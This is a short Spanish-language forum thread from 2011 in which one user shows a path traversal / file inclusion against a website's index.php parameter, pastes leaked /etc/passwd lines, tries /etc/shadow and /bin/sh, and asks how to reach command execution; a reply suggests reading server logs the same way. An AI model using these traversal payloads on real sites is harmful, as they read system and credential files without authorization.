elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ejecutar comandos desde lectura?		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ejecutar comandos desde lectura?  (Leído 3,092 veces)
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Ejecutar comandos desde lectura?
« en: 10 Febrero 2011, 17:42 pm »
Tengo lectura de archivos limitada en una pagina.

/index.php?mostrar=buscador.php

/index.php?mostrar=../../../../../../../../../etc/passwd

Código:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh
...


/index.php?mostrar=../../../../../../../../../etc/shadow

error... blah blah blah


/index.php?mostrar=../../../../../../../../../bin/sh

Código:
Warning: Unexpected character in input: '' (ASCII=18) state=1 in /bin/dash on line 49

Parse error: syntax error, unexpected T_STRING in /bin/dash on line 49



hay alguna forma de esto pasar a ejecutar comandos ? guardar archivos? o algo?

ya probe encontrar otro error y aun no hay caso.
En línea
Experimental Serial Lain [Linux User]
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: Ejecutar comandos desde lectura?
« Respuesta #1 en: 10 Febrero 2011, 19:27 pm »
Wow como se llamaba esta vulnerabilidad? Es que de exploiting web estoy sin blanca jaja...
Pues lo que podrías hacer sería leer algún log de ssh o demás a ver que ves...
/index.php?mostrar=../../../../../../../../../var/log/XXX

Mmm tengo curiosidad... Alguna otra idea?
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
..Ejecutar comandos en la consola desde vb
Programación Visual Basic 		MaLkAvIaN_NeT 5 7,092 Último mensaje 4 Octubre 2005, 04:52 am
por MaLkAvIaN_NeT
Como ejecutar comandos telnet en un router desde un programa en C?
Programación C/C++ 		4rkn63l 1 3,691 Último mensaje 29 Enero 2012, 18:24 pm
por qerde
Duda sobre ejecutar comandos Linux/ubuntu desde PHP
PHP 		LostMortal 1 2,692 Último mensaje 24 Diciembre 2013, 12:48 pm
por el-brujo
Ejecutar comandos desde las reglas de Nginx « 1 2 3 »
GNU/Linux 		WHK 23 12,054 Último mensaje 7 Mayo 2015, 05:30 am
por WHK
¿Como puedo ejecutar los comandos desde CMD?
Dudas Generales 		underhoms 8 3,794 Último mensaje 16 Enero 2020, 05:23 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines